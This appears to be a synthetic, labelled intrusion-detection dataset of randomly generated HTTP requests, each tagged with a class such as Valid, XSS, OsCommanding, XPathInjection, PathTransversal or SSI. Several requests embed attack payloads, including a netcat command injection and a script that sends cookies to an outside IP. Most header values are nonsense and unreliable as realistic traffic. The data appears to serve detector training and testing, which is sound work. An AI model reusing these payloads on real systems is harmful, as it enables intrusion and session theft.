GET /raY/c_/jEsRmPql7e0passwdUusr/5a1noIo7cgtr.tiff?tTreeRz7eQsheiN=31&oEtesf14ato=irdozasoae%3F&kpUk=ihIsdaeHqsoimrei&l0eerqxbtshIrai=etdunr%5D&7mTogitm=ykay7iwp-be1e&9fnraesnuGgnn=eoechoesyoaccess_logAanre&ep=H+knph-a&location45GEYPY=420 HTTP/1.0
Host: www.woiWe5j.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: min-fresh=18689
Client-ip: 111.95.11.244
Cookie: reiR3=155439571;e7erlsente=hw+;optasdsnno=37
Cookie2: $Version="9"
Date: Fri, 25 Jun 04 12:29:48 GMT
ETag: W/"Hw.-vMq@PRe4kqvba1"
Expect: hepFi=alinog
From: labOkeyp@Tmrr6ene.de
If-Modified-Since: Mon, 04 Jun 07 05:17:34 GMT
If-Unmodified-Since: Wed, 15 Aug 07 09:38:29 GMT
If-Match: "OkXNAu-l6i3HvxhI"
If-None-Match: *
If-Range: "03S2rUwPeEl6d8JoC@v"
Max-Forwards: 80
MIME-Version: 9.4
Pragma: unt9stHe=oAetu
Proxy-Authorization: Digest qop=ldtEtf6e
Authorization: Digest uri=/hoiTptrr/lKaatsus/knaA.php4
Range: 32-,55-8,-1
Referer: /5t18Eiwn/eigBh62/Ahais.msf
TE: trailers,trailers,chunked
Trailer: Referer
User-Agent: Mozilla/4.4 (Windows; U; WinNT 6.6; fe-dn; rv:2.2.9) Gecko/42344185
UA-CPU: MIPS
UA-Disp: 866,9955,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5645x571
Via: 8.1 www.yelreT.css, 6.4 www.mnejs.jpg:24012, 8.8 www.ga76t.js
Transfer-Encoding: gzip
Upgrade: nt4mte/1.5, e7ttw/7.8, rqstaj/5.3, 2fytn/3.2, adu/2.2
Warning: 950 135.96.59.66 "get026dNoiraiwlk" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 46126280
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 22740
Start - Id: 40796
class: SSI
GET /eNYi-rm/wpN7usL.ugH/8S/hess4T24naTllaeAro/nHEzs/Jwherefl4X0aq@perlR8jM.png?_CwhereybZStSiCsock_stream=%3C%21--+++%23odbc++connect%3D%22ioh%2Cisayie%2Csbnb%22+++++statement%3D%22select+*++++from++++a%22--%3E&sa=12816880&i3ltgn=tasFuhessQ&Xoboot.iniGNYNN=na&iDsutidlnjPm=714996&ueiuemsRta=352419&euz=r7uB-11cpK&onn3ed=8992&KreplaceLYHQIEaf=171217&prdotrrrveE=5&ELBMe=522691&rf3mJsiugpbs=97127012&bi7aHtDsttteesj=tlailez6fea5es HTTP/1.1
Host: 0.4.166.32
Connection: close
Accept: */*
Accept-Charset: iso-2022-kr, windows-1252;q=0.0, x-mac-arabic
Accept-Encoding: deflate, deflate;q=0.2, deflate;q=0.6
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 187.102.187.0
Cookie: 1l1Stieqc=Cdrlt;2ary=l
Cookie2: $Version="693"
Date: Wed, 24 Mar 10 20:50:38 GMT
ETag: "Mkc9ZM08CabKyv1n"
Expect: nsirg=5AerheO;iropdi=icem1yli
From: iiljwdi@httr81j.de
If-Modified-Since: Thu, 14 May 09 20:47:47 UTC
If-Unmodified-Since: Fri, 15 Jan 10 24:13:03 GMT
If-Match: *
If-None-Match: "TRbdkbt1jx-OYQg8UH0K"
If-Range: *
Max-Forwards: 88
MIME-Version: 8.4
Pragma: itipoo='taehhoi9'
Proxy-Authorization: Digest username="easT"
Authorization: NTLM eDFnYXNpYXRocnRlaml3bmN5cWVzcm4xNHRMYTR0eXBzdG5lYUVyRGFnN2VU
Range: -473515,10127-9,-129281
Referer: /mysuaiS/bphn/Wsse.pl
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.5 (compatible; yrbyh; Win 9x; nlte3I; akt2rurJ)
UA-CPU: 68000
UA-Disp: 5062,338,8
UA-OS: Win98
UA-Pixels: 8812x175
Via: FTP/8.5 www.6ohlPlh9.js, 8.7 www.Tp43o7ue.tiff, 7.5 0.100.47.153
Transfer-Encoding: HtRp; esaeps=i2ta2re
Upgrade: esgRe/5.9, tlnqol/7.8, 2ie/9.3, n6or/1.6
Warning: 512 www.zgaaa4Nn.html "tnlssOrNs" 
X-Serial-Number: 095022921
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40796
Start - Id: 21937
class: Valid
GET /nntvnt/aQ/rj1h0OAMeDiHs1/ATTZ8copy.PW8pGQDpasswd/zmrF/utovdpNs8reNeusadu/9b@2b/ezrdp/h4FVI-fqWjgN/mIFnyud2KgSr@YtrZWc.cgi?yNeo=uG1J&nrgfolrgaierpqe=connecto%3Ah&tusrt@HJ=ene%5Dts%28eayu4m&so=gz&6dyt5c=eseyu6&sjaetanab=anzotosowtp5 HTTP/1.1
Host: www.nBele7gt7.it
Connection: keep-alive
Accept: image/gif;q=0.7, text/*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=16
Client-ip: 16.219.91.127
Cookie: utnqetaoo=155807;Dp3mZLkkGJE= jn7gncer;ddt=xanr;70YSHPFzsock_streamq=t1oh;bpgo1trtwcsw=sohay8fhodaia
Cookie2: $Version="7"
Date: Sun, 09 Jul 06 24:09:49 CET
ETag: W/"iY-@jOFWSIQWIWo0YtmT"
Expect: stooeyr=sire;4eafodr
From: slrRd@iranIqirm.be
If-Modified-Since: Sun, 06 Jul 08 20:09:26 UTC
If-Unmodified-Since: Mon, 04 Sep 06 23:29:03 UTC
If-Match: "ZLdxiiSSrjQjGrfc"
If-None-Match: *
If-Range: "vOXgYMQvaRrArUt."
Max-Forwards: 4
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic ZmVjb2tmTDpvbXBl
Authorization: Ul7a ndPry=ctbIrNpe
Range: 78-963,508-,4872-44294
Referer: http://www.uoesdhd.org/ahunLm/knoR/hT1nSs.msf
TE: chunked,chunked;q=0.1,trailers
Trailer: Referer
User-Agent: Mozilla/2.6 (compatible; Konqueror/4.4; Linux i386; 29oqgsd3ci; eeTci; y8riecsrt)
UA-CPU: x86
UA-Disp: 069,983,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 350x171
Via: 0.8 www.faueaBsr.shtml, HTTP/1.5 191.16.92.136:7, HTTP/2.1 250.154.216.215:4781
Transfer-Encoding: gzip
Upgrade: eoa1/3.0, hiir/9.7, 4tf/2.3, u1ad/4.7
Warning: 945 www.u1eyergi.jpg:82873 "ihvut8ngwso" 
X-Forwarded-For: 210.111.100.63
X-Serial-Number: 09176432061314
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21937
Start - Id: 49968
class: XPathInjection
GET /qastM04Etbqn0tgrsva.html?ospt=oent+ht1&hrm=56749&2tVy-8Ei=8247629462&teee=08888&eao=x+Wq%5D&oedwdspsoa=i&WaWx=lnr&tSusybn=126&Omqoist6sotTm=exec0pi&or8siil=ntrcaatpeuaneie8a&seeOsoslg=k%2FwgetUbanOkorrhDrn&ziriyoeDedrte=esoaerherzsile&tIsntCntn6ogGm=Rgoga%2Fu%2FgCbh6%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D86%5D++or++%27orpe6n%27++%3D+%27&naoH8hwepliht=sbrSrrj+to%7Ceet HTTP/1.1
Host: 85.61.61.51
Connection: Ent6t6ao
Accept: image/*
Accept-Charset: utf-7, ks_c_5601-1987
Accept-Encoding: deflate;q=0.0
Accept-Language: fneil-iiffzih;q=0.0, msetr-gaD
Cache-Control: only-if-cached
Client-ip: 164.99.223.41
Date: Fri, 19 Oct 07 01:03:29 GMT
Expect: ahthray
If-Modified-Since: Wed, 11 Jul 07 04:45:53 UTC
If-Unmodified-Since: Tue, 07 Apr 09 10:57:19 GMT
If-Match: *
If-Range: Sun, 14 Aug 05 13:04:39 CET
Max-Forwards: 6
MIME-Version: 2.7
Pragma: pe='ozIwbH'
Authorization: Digest response="fd530FB1f4d6e6B5795Acf09EE08cC4F"
Referer: /L6eaa/A8olci/iBe4ms/lRTeacd/snrptdo0.jsp
Trailer: Accept-Encoding
User-Agent: PtoNoilbaxintr
UA-OS: Linux
Via: eon/8.4 118.143.237.205

null

End - Id: 49968
Start - Id: 46287
class: PathTransversal
GET /iie/vFFb92sGxw__uHJdOou/nSskFI8a8pzmeqfd/40trm/io.sh?dnpob=g%3A%2F.htaccess%7E&1Jsi=n4g&bdtoertouiKded=o9eand0eetip&11wiPX=ylxhainterbn6ni&ayaftthtsit1l=3828646&ealrxlrBdetn=snnr&Ol9gCOgY=045&isw2=Trv&Sractcl1rsvre=gr+ HTTP/1.0
Host: 185.183.106.199
Connection: MmuO4
Accept: application/*;q=0.2, video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Neenep-bOes;q=0.9, mi-p0n;q=0.5, pEbdl-soif
Cache-Control: no-transform
Client-ip: 54.146.114.194
Cookie: 5cr=spEjrsn6orohmarEs;DGhH5ncS8nZ=anlt0afhsmtro$n~;o9se=tm7c
Cookie2: $Version="3"
Date: Sat, 28 Feb 09 24:49:28 UTC
ETag: W/"Tr79t_UXhl_B.uI5Su"
Expect: 100-continue
From: rhcEtdlT@plt6rnlmRh.it
If-Modified-Since: Sun, 28 Jun 09 01:45:42 UTC
If-Unmodified-Since: Thu, 18 Mar 10 24:25:32 UTC
If-Match: "qQGXZdTgFVV2GicZ2Yz"
If-None-Match: "BWYnQVYZZntYhMidtpH"
If-Range: Fri, 29 Oct 04 11:02:37 CET
Max-Forwards: 5
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest uri=/ygess/rPo2ct/Manhrsn/oyiihes/ger1eh.exe
Authorization: Digest qop=auth-int
Range: 5-,07-2
Referer: /nsei/veauo/oO2n/stYtt.png
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: ttred6gtien
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1380x824
Via: HTTP/8.6 215.163.107.69, 9.1 www.m4abG.shtml, 4ozf/9.8 62.151.149.157
Transfer-Encoding: deflate
Upgrade: Su9qj/8.6, baec/7.2
Warning: 966 120.240.162.4:31750 "00mbdoaEom" 
X-Forwarded-For: 136.2.161.83
X-Serial-Number: 576547919315
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46287
Start - Id: 43306
class: OsCommanding
GET /5e/a-kMzWDwzXC/rJ/eeap6rsjsoo8taenaSto/aeiqlce/aI.php3?ho1rjlest4e=einao&6u=httpe5hfcs9%3Azceqhat%24%3Ea&8ZftpcXYPcgGopen=hg&cyomp3=etmgeaud&.logJA6=1o%29saFooeisggz&qikem7Iozr=%250a+++nc++www.sedeoltegeor.com++++80+++++%3B&qqkU8xtermXt1o=3&lnc9eixeb=s5ntEan9xlt&dTIee=%5Da7&wojYaosfrE=sc&ebvotan=70395408&mssidh=zn&slt6egpa9hiee=0&atnrAmFie=43 HTTP/1.0
Host: 123.139.244.175:696
Connection: keep-alive
Accept: text/*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, identity;q=0.9, identity;q=0.5, compress;q=0.4
Accept-Language: 2s09lOx-faehN;q=0.6, lsit-srb, esu-bs1iodhT, McEav-iIttIaa;q=0.3
Cache-Control: iajks=giuesrF2
Client-ip: 102.61.9.190
Cookie: fdUei=0Tk0AmFe;.mZASPE5=ld5ztctacbaped
Cookie2: $Version="21"
Date: Sun, 30 Jul 06 23:08:33 CET
ETag: "R9o82xN8kyAh79Fd2g"
Expect: 100-continue
From: ehhmnsme@ohym.uk
If-Modified-Since: Thu, 25 Jan 07 20:34:29 UTC
If-Unmodified-Since: Wed, 21 Jan 09 12:00:09 GMT
If-Match: "bo.nYMc.KHOEAqWVu"
If-None-Match: "cEn4Z4APk9D@ZPJ"
If-Range: Mon, 19 Sep 05 05:23:10 UTC
Max-Forwards: 7
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic cDlzYVNpc3Q6cEZOZnIx
Authorization: Basic c2l0RWE2YTU6ZlR0d2Vz
Range: 398265-
Referer: http://www.ceiarve.ch/e2pfo.cfm
TE: trailers,chunked;q=0.3
Trailer: Cache-Control
User-Agent: ov2aajru/0.6.5
UA-CPU: StrongARM
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: 3.4 16.51.69.58, FTP/7.7 www.oeriltx.htm
Transfer-Encoding: compress
Upgrade: svhC/6.6, eeeovf/0.6, Rs9jj/2.4, inuc/6.8
Warning: 597 167.142.104.140 "ureioenlrkas6ps" 
X-Forwarded-For: 31.255.144.84
X-Serial-Number: 33268910997830583
----: ---------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43306
Start - Id: 47758
class: XSS
GET /jUtpassthruPW7e5eif/tvzovE64.rV9.png?syenaaoeeholwn=%5B%5CxC0%5D%5B%5CxBC%5Dscript++++%3E%5Bwindow.open%28%27http%3A%2F%2F20.12.202.21%2Fraonle.asmx%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript+%3E&bfta3e65sttozt=734085196 HTTP/1.0
Host: www.aldtrr.it
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-jp
Accept-Encoding: gzip, deflate;q=0.5, deflate, compress, identity
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 50.133.69.15
Cookie: iiman=551557941;AHJyww=67525;adm=euFyqs;we2vfn73octedin=ahijoclz5c
Cookie2: $Version="9"
Date: Thu, 30 Apr 09 12:34:28 UTC
ETag: "V0Vh57R1gKYyWC."
Expect: d1Sn88md=cmr2icr;5hrwruT
From: ychumrg@eeAsehi.cz
If-Modified-Since: Tue, 05 Oct 04 20:59:43 CET
If-Unmodified-Since: Sat, 07 Mar 09 21:57:07 UTC
If-Match: "lhxbXdS7X1JOenXbX"
If-None-Match: "OyVqSAR8XdFF-K@N"
If-Range: Wed, 05 Apr 06 13:04:38 UTC
Max-Forwards: 18
MIME-Version: 7.7
Pragma: eath='ohntO'
Proxy-Authorization: Basic dW55dDplbndoaWJj
Authorization: NTLM ZWV5bDVoaW41cmVldWJhd1RvZUQzdGVsb0JVYWVsZzBzNmE=
Range: -41921,082-
Referer: http://ieth.org/pRNrp5sw/6fbhhM/otrinSa.jsp
TE: chunked,trailers
Trailer: Date
User-Agent: Mozilla/4.6 (Windows; U; Windows NT 1.2; ie-7t; rv:3.4.9) Gecko/36633150
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 561x6609
Via: HTTP/9.2 www.szlcaktH.htm, HTTP/1.7 224.81.244.245, 2.4 www.0bsi.tiff
Transfer-Encoding: gzip
Upgrade: napl/9.6, u8eeko/2.8, unr/6.5, Cfe7/9.8
Warning: 123 216.249.112.222 "zvuintlrwsyt" 
X-Forwarded-For: 88.106.208.229
X-Serial-Number: 47690533150312984482
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47758
Start - Id: 9502
class: Valid
GET /e1Vh/uySWGOqEF9EmplY0zfNh/-FCAtmpHK2Q9/esimae/ni@1CZJTKPsluLL3g/PE6-zZCHcfggs/Gpm06labalart79HUT/k63ojH-vu/nUS/zo1vcnfeventdc3/tE/LbesnEb.sh?XSv3N5F=4040&esrqsfoe=4747269&nn=T1processing-instructionnal&ub=+&ootsm1xea=bmd%3AdptcNt&fygdeohcr=79&12Rrplog=5980745 HTTP/1.1
Host: 227.187.205.54
Connection: close
Accept: */*
Accept-Charset: macintosh
Accept-Encoding: deflate;q=0.8, deflate
Accept-Language: lwsk4rr-ablmaE;q=0.7, oae-xe0, Ib-kliih, osEndnE-the
Cache-Control: max-age=64024
Client-ip: 193.54.140.120
Cookie: yh5iofngh=eHy;ouaegimhduE=8098067;l8tnst=56075826;H76mailF95=482225;ddvcEtXqnA2rs=ieeo;e8irLmpetai=t
Cookie2: $Version="261"
Date: Sat, 14 Aug 04 05:27:20 UTC
ETag: "k8IqJld@uYhepU6"
Expect: uohs
From: edeOomt@ioOp.com
If-Modified-Since: Fri, 21 Sep 07 09:35:43 UTC
If-Unmodified-Since: Thu, 25 Jun 09 13:47:40 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 729
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM dGVvcjRkcXlyemlsZ3FvZnMyZnNzZTZnTXJhc3VhaXRwemVzZXBIaE4=
Authorization: Basic MmNoOWU6bm5pZQ==
Range: 870431-,61-,-3837
Referer: /lrrc3.js
TE: trailers
Trailer: Referer
User-Agent: ooepi7nas (n_9aXe; oIRx_zek.t)
UA-CPU: PowerPC
UA-Disp: 369,697,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 279x7075
Via: FTP/4.4 www.dosyhp.shtml, 8.8 www.dadde.css
Transfer-Encoding: oso0; Phub3=rudiTzei
Upgrade: bwWi/3.1, zkhl/4.3, twHeh5/0.5, npiron/8.7, yece/2.3
Warning: 098 24.253.203.103:690 "yeiytiSmccyiashaai" "Sun, 20 Mar 05 12:20:44 GMT"
X-Forwarded-For: 140.234.18.98
X-Serial-Number: 5599119283941663287
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 9502
Start - Id: 31154
class: Valid
GET /peb97ab/el7ReUCmtAmo6oe/aashs/tlEmw/4TSbXuy8/8EVfiXe8G/nBFss-KBzR.tiff?eanuidho=d-nua+i%28e%3Cogopvla&6jtfdlnn=orSnjCzncncuior HTTP/1.1
Host: 26.85.158.172
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: tir1ahof-4l, rw-hm;q=0.1, essIpn6p-d;q=0.8, Ger9-pdn
Cache-Control: hxxt=atseetAs
Client-ip: 23.174.197.157
Cookie: mhtpass_8T7mail2Ar1=rmute>/ nSdt/pW;l7hn=oG;ctatrEu7sSEdrn=1680;maiiurni=856785
Cookie2: $Version="3"
Date: Tue, 15 Nov 05 21:11:08 GMT
ETag: "lOdYqY43p4_4Icp@U"
Expect: ag4bit
From: eHyxdc@nttofeahoi.net
If-Modified-Since: Tue, 23 Mar 04 14:30:00 GMT
If-Unmodified-Since: Mon, 14 Apr 08 21:22:17 GMT
If-Match: "igJciaQmS00hBl9TS"
If-None-Match: *
If-Range: "JaX@mLabDiDM6Yigzu7"
Max-Forwards: 8584
MIME-Version: 4.4
Pragma: te='xhtoe'
Proxy-Authorization: Basic bmlubzpoc3R1RWk5
Authorization: eife ietoao=r7amra
Range: 41-,7530-978
Referer: /B2jr/esoDtqx/sgoa/lidrtns/ldavIsro.js
TE: trailers,trailers,chunked
Trailer: Connection
User-Agent: Mozilla/6.7 (Machintosh; U; PPC Mac OS X 9.7; tn-nc; rv:2.3.6) Gecko/24134291
UA-CPU: StrongARM
UA-Disp: 342,300,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 006x0158
Via: FTP/5.8 www.mthdEe.html:5382
Transfer-Encoding: Cehn
Upgrade: Lr9lei/6.9, imH4t/7.3
Warning: 406 www.aeUwu.shtml "s2n0a3tdlcheeb4euana" 
X-Forwarded-For: 193.229.38.157
X-Serial-Number: 1704318559609
----: ---------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 31154
Start - Id: 19638
class: Valid
GET /wy/s3Lli/eJ7aJQKEe@UVU_1Tb-4/oitatehrolslem/UstyleQaw8ftpxokqUOgroup by.tiff?Ern4x=atwtihe1oeT&KrRrchildTT=34378&pnTclldd=hvl9ap%26eao4u&rftdng=7&ditbe=iexmrat6etaretg&aglkeoa=eto5n5qnn%3B0&dAe=oowmec&Eh7e=720943&XUcCmreplaceCl0a=tad&s7bs4ad6e6apw=sS%3Feomo&0E_cJVIe=oEnlsciTnnoo HTTP/1.1
Host: www.abnnl3t.net
Connection: Upaq
Accept: */*;q=0.8
Accept-Charset: x-mac-turkish;q=0.8, windows-1251;q=0.9, shift_jis;q=0.9, x-mac-korean, windows-1258
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 214.52.69.197
Cookie: dc=rce8yweLcdf;5esEwate20n9O=o5nS;oaeYaae=551860
Cookie2: $Version="644"
Date: Tue, 18 Oct 05 09:37:26 CET
ETag: W/"CUhNPirgxLy0Moc"
Expect: 5iapapo
From: 5I1Ng@daEopu.org
If-Modified-Since: Wed, 21 Oct 09 18:47:59 UTC
If-Unmodified-Since: Mon, 19 Jun 06 01:38:15 GMT
If-Match: "zCxm1vS4IhDvaEz2d"
If-None-Match: "Ae3._r0f9TW@2easkl"
If-Range: Thu, 15 Apr 04 03:02:34 GMT
Max-Forwards: 1694
MIME-Version: 6.3
Pragma: hholetu='1gp'
Proxy-Authorization: NTLM YVRzb3BlZ2lBc2hhb3Rwb3JwZ2hpZTNzQW5wQWg0b25kV3NpdmlleWRl
Authorization: NTLM eWdscmVkZ2VTdFJvZGdNcDR0ZHVBaW1pemFudFRjaTZ1bm43cnN3ZWxzdGd3
Range: 3666-92,-7
Referer: http://2nmsal.com/7dic8/hioDoeqn/xbtcs/ciAuu.gif
TE: deflate,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/6.7 (Machintosh; U; Mac OS X 4.4; hr-he; rv:6.1.5) Gecko/05588400
UA-CPU: x86
UA-Disp: 1867,055,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2031x847
Via: 9.8 18.48.69.66
Transfer-Encoding: compress
Upgrade: emf/6.5
Warning: 311 www.Werengn.htm "uwnHorhfkumatwT" "Wed, 23 Jul 08 22:55:33 GMT"
X-Forwarded-For: 161.92.181.94
X-Serial-Number: 84453733272881684848
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19638
Start - Id: 16621
class: Valid
GET /yhjrpnPr.mdb?lEHx_=6&aeeqrs8tazanvmu=aht0iywyum&zna=swn&t7Hffd=mperlthdeI&6jUKY%u8_=iTnMvtninAr3tu&0Q6C-a=576&aA6kx8J=tsmpzntmH6titd&usmr0sS=s5oretiead%40r%3Cettwib+&esgLfhntuse=e&mS4eottkg3qba=i10XuiEQDbHF&qbipbgeD=eXrw9KZ HTTP/1.1
Host: 194.106.143.26
Connection: nkreEoie
Accept: audio/*, application/*;q=0.2
Accept-Charset: utf-7;q=0.0, cp-950;q=0.5, euc-jp;q=0.3, isiri-3342
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 174.157.200.138
Cookie: msaExe=73789888;j5tnvbikes1sttt=jEr~ysiz;rwfscttioeaabs=2014644;iircrg=7126974265;isleuttie=4111;0Teot35ato=T1E
Cookie2: $Version="330"
Date: Tue, 01 Apr 08 03:08:46 GMT
ETag: W/"jan28hfMU5ZG@F7I@1"
Expect: 100-continue
From: 7seuv@bk2haa.ch
If-Modified-Since: Sun, 27 Dec 09 10:31:27 CET
If-Unmodified-Since: Thu, 28 Apr 05 20:52:43 CET
If-Match: *
If-None-Match: "kkq4AI2HbAtnqGb"
If-Range: "F7mjkCq.z8qR_Y2dhk"
Max-Forwards: 2013
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="rpsns9"
Authorization: B0me ey8ztnh=ltetv
Range: -51502,35-0418,-016
Referer: http://teb9E.net/bipll.nsf
TE: trailers,deflate;q=0.7,deflate
Trailer: From
User-Agent: tanl/8.0.4.1
UA-CPU: 68000
UA-Disp: 009,955,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 702x893
Via: 6.8 www.htnht.shtml, 9.9 www.auYsEgms.jpeg, 7.7 205.238.235.145
Transfer-Encoding: zemn6; 7uihy=tr3aldn
Upgrade: rmRlAA/6.1
Warning: 144 84.222.150.233 "udseldAuvnntiswe" "Tue, 18 Apr 06 02:19:07 UTC"
X-Forwarded-For: 2.103.180.182
X-Serial-Number: 6104122445139965688
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 16621
Start - Id: 11726
class: Valid
GET /WsoleVuai/5QN9dCiYoy73H.css? HTTP/1.1
Host: www.ucmao4Ctti.ch
Connection: close
Accept: application/*;q=0.3, image/*;q=0.7, video/*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, identity;q=0.3
Accept-Language: r83thsb-ipria;q=0.8
Cache-Control: only-if-cached
Client-ip: 79.71.44.119
Cookie: rAhredpude=Edicel
Cookie2: $Version="6"
Date: Mon, 24 Jul 06 23:08:02 CET
ETag: W/"l_zW--IfNE6M3bDz"
Expect: lh9t=rqsddse
From: lAuala@v9ti4o.be
If-Modified-Since: Wed, 23 Jan 08 16:52:24 GMT
If-Unmodified-Since: Wed, 07 Nov 07 03:32:09 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 30 Aug 06 05:56:36 UTC
Max-Forwards: 0340
MIME-Version: 4.3
Pragma: aYue='naed'
Proxy-Authorization: Digest response="aC035b73FACF986E93e1E771dF14eF2b"
Authorization: Basic ZXU4dE46MW81VmVubg==
Range: -63,010806-6
Referer: /5tni/oiNnarh/hmeAd/de9iebn.zip
TE: gzip;q=0.5,gzip,gzip
Trailer: Accept
User-Agent: mxywrR (w_t4IybFWg; y.keOL5ztu)
UA-CPU: x86
UA-Disp: 7321,446,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 0846x910
Via: 0.0 231.110.177.58
Transfer-Encoding: deflate
Upgrade: ev2/2.0
Warning: 663 www.ynai9.tiff "n7t2mdsRiashos" "Fri, 19 Jun 09 23:55:59 UTC"
X-Forwarded-For: 173.221.98.4
X-Serial-Number: 68893779
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 11726
Start - Id: 11147
class: Valid
GET /Vz2/s4/passthruoAU/rohsiattrlebRie3kbee/tsnfh3hrlreunirR1Gze/hkMEsxmldrop7WH3B/wyHSu7@EI84VVs5/rn/eye2mk4ihENhmkrut/0all.mspx?autoexecy_p9qj7=haiecfseqia&mrrihxsaiw=rvf&dids=deea&OA6eltseeonhw9E=04&edNw=rb%5D%3A4 HTTP/1.0
Host: 134.153.143.21
Connection: close
Accept: application/*;q=0.0, image/jpeg;q=0.7, video/mpeg;q=0.8
Accept-Charset: utf-8
Accept-Encoding: 
Accept-Language: e-e1jae
Cache-Control: 7bu='mdo'
Client-ip: 124.3.147.71
Cookie: errgz=cNOgnutezodtEn;hnt0raTe=home
Cookie2: $Version="58"
Date: Sat, 15 Nov 08 17:56:44 GMT
ETag: W/"pqa7.Eb.076tCbGL"
Expect: 2wtrw0=r6rtsi
From: nbnonNn@grbrm2hnt.gov
If-Modified-Since: Fri, 24 Dec 04 15:40:15 CET
If-Unmodified-Since: Thu, 21 Dec 06 02:31:48 UTC
If-Match: *
If-None-Match: "SZX5f7QdJqD6@8p2bt"
If-Range: *
Max-Forwards: 9845
MIME-Version: 0.7
Pragma: sdNi2aw='1o0bwE6'
Proxy-Authorization: Digest response="FF6f55D1baDeb6c2C872bb57B9eB0aDd"
Authorization: NTLM RWlqblNSc25haGxxbmZ1aU5kZWE5dHRyeHNzeGVlbmt0cA==
Range: 5-671745,5852-9861
Referer: http://e3jhuijG.be/aDhtarj9/hri7se9/hryep0/edxe.cgi
TE: deflate;q=0.7
Trailer: Max-Forwards
User-Agent: smtzridW/5.4.6.7
UA-CPU: 68000
UA-Disp: 8419,120,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 571x624
Via: 8.7 80.145.216.187, e6I/4.9 191.82.209.73
Transfer-Encoding: Eeklsd; eblvsel=Ch1hu
Upgrade: hgrW/3.1
Warning: 737 www.hthant.png "mlsoetrtnrkeo" "Sun, 21 Feb 10 09:04:38 CET"
X-Forwarded-For: 207.202.183.212
X-Serial-Number: 98553683859236748
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 11147
Start - Id: 15646
class: Valid
GET /hnpositionxp_VHMSadminYHsa/U5Ndocumentt6EI6fo0delete/winntOenetcatjPN@c/peugtrauyioslmli7Eo3.mspx?ebBu=7081 HTTP/1.1
Host: www.sIoJEnnre.de
Connection: egrla
Accept: image/gif, image/png
Accept-Charset: big5;q=0.9, x-mac-arabic
Accept-Encoding: *
Accept-Language: TsopENh-chwh
Cache-Control: only-if-cached
Client-ip: 4.246.59.54
Cookie: rCreplaceUftpY=f)w
Cookie2: $Version="249"
Date: Mon, 19 Jun 06 15:05:00 UTC
ETag: "xvrGAl72O1df_-dcW6kM"
Expect: os6bi=AtHottq;ytotu
From: enyentta@0oaremMh1h.cz
If-Modified-Since: Mon, 19 Sep 05 13:08:02 CET
If-Unmodified-Since: Sun, 20 Dec 09 10:17:10 GMT
If-Match: "lbzDEACzq9KJo14O"
If-None-Match: "svrb.ZOjz1KABN1My3ki"
If-Range: Fri, 15 Jan 10 08:22:20 UTC
Max-Forwards: 70
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWVod3l5aWFlZzRBam1pZVhpRTBzZWFhdGhqb3NudWl1ZUh2aXhuSWFMbXMxT3Q=
Authorization: Basic aGU4YTpTbTdhaDU=
Range: -29,-2
Referer: /nekr/obte/uuamo/eyntisvj/on4ee.tiff
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.3 (Machintosh; U; PPC Mac OS X 6.7; pw-tq; rv:2.7.9) Gecko/94750921
UA-CPU: PowerPC
UA-Disp: 6429,5125,8
